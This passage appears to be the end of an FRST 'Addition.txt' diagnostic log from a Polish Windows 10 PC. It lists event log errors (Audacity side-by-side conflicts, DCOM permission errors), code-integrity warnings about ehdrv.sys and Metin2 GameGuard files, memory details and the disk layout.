SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/25/2018 10:28:58 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/25/2018 08:28:45 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/25/2018 08:28:45 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/25/2018 08:24:25 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. System errors: ============= Error: (01/26/2018 06:38:08 PM) (Source: DCOM) (EventID: 10016) (User: KOMPUTERKUBY) Description: Zgodnie z ustawieniami uprawnienia application-specific nie jest udzielane uprawnienie Local Activation do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi KomputerKuby\Kuba o identyfikatorze zabezpieczeń SID (S-1-5-21-3338460377-1035617240-3592817547-1001) z adresu LocalHost (Using LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Unavailable (Unavailable). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (01/26/2018 06:36:44 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: Zgodnie z ustawieniami uprawnienia application-specific nie jest udzielane uprawnienie Local Activation do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi NT AUTHORITY\NETWORK SERVICE o identyfikatorze zabezpieczeń SID (S-1-5-20) z adresu LocalHost (Using LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Unavailable (Unavailable). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (01/26/2018 06:34:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Origin Web Helper Service z powodu następującego błędu: Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie. Error: (01/26/2018 06:34:04 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Origin Web Helper Service. Error: (01/26/2018 06:34:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: Zgodnie z ustawieniami uprawnienia application-specific nie jest udzielane uprawnienie Local Activation do aplikacji serwera COM z identyfikatorem klasy CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} i identyfikatorem aplikacji APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} użytkownikowi NT AUTHORITY\LOCAL SERVICE o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (Using LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Unavailable (Unavailable). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (01/26/2018 06:34:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: Zgodnie z ustawieniami uprawnienia application-specific nie jest udzielane uprawnienie Local Activation do aplikacji serwera COM z identyfikatorem klasy CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} i identyfikatorem aplikacji APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} użytkownikowi NT AUTHORITY\LOCAL SERVICE o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (Using LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Unavailable (Unavailable). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (01/26/2018 06:34:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: Zgodnie z ustawieniami uprawnienia application-specific nie jest udzielane uprawnienie Local Activation do aplikacji serwera COM z identyfikatorem klasy CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} i identyfikatorem aplikacji APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} użytkownikowi NT AUTHORITY\LOCAL SERVICE o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (Using LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Unavailable (Unavailable). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (01/26/2018 06:34:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: Zgodnie z ustawieniami uprawnienia application-specific nie jest udzielane uprawnienie Local Activation do aplikacji serwera COM z identyfikatorem klasy CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} i identyfikatorem aplikacji APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} użytkownikowi NT AUTHORITY\LOCAL SERVICE o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (Using LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Unavailable (Unavailable). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (01/26/2018 06:33:34 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10000) (User: NT AUTHORITY) Description: Uruchomienie modułu rozszerzalności sieci WLAN nie powiodło się. Ścieżka modułu: C:\WINDOWS\system32\athExt.dll Kod błędu: 126 Error: (01/26/2018 06:32:11 PM) (Source: DCOM) (EventID: 10010) (User: KOMPUTERKUBY) Description: Serwer Microsoft.Windows.ContentDeliveryManager_10.0.16299.15_neutral_neutral_cw5n1h2txyewy!App.AppX447jn8wbjb1qsw3jxkndb19cwgsrtrkk.mca nie zarejestrował się w modelu DCOM w wymaganym czasie. CodeIntegrity: =================================== Date: 2018-01-26 18:01:14.279 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ehdrv.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-01-26 18:01:14.184 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ehdrv.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-01-26 18:01:10.449 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ehdrv.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-01-26 18:01:10.328 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ehdrv.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-12-17 21:49:04.618 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume3\Metin2\GameGuard\npggNT64.des that did not meet the Microsoft signing level requirements. Date: 2017-12-17 21:48:18.780 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Metin2\GameGuard\npggNT64.des that did not meet the Microsoft signing level requirements. Date: 2017-12-12 21:49:02.302 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume3\Metin2\GameGuard\npggNT64.des that did not meet the Microsoft signing level requirements. Date: 2017-12-12 21:34:40.714 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume3\Metin2\GameGuard\npggNT64.des that did not meet the Microsoft signing level requirements. Date: 2017-12-12 21:34:31.720 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Metin2\GameGuard\npggNT64.des that did not meet the Microsoft signing level requirements. Date: 2017-12-12 21:34:20.149 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SysWOW64\svchost.exe) attempted to load \Device\HarddiskVolume3\Metin2\GameGuard\npggNT.des that did not meet the Unchecked signing level requirements. ==================== Memory info =========================== Processor: AMD Athlon(tm) II X4 620 Processor Percentage of memory in use: 51% Total physical RAM: 6143.24 MB Available physical RAM: 2993.86 MB Total Virtual: 7167.24 MB Available Virtual: 3819.7 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:142.67 GB) (Free:34.96 GB) NTFS Drive d: () (Fixed) (Total:547.65 GB) (Free:360.54 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: 62FAAE59) Partition 1: (Active) - (Size=3 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=142.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=547.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================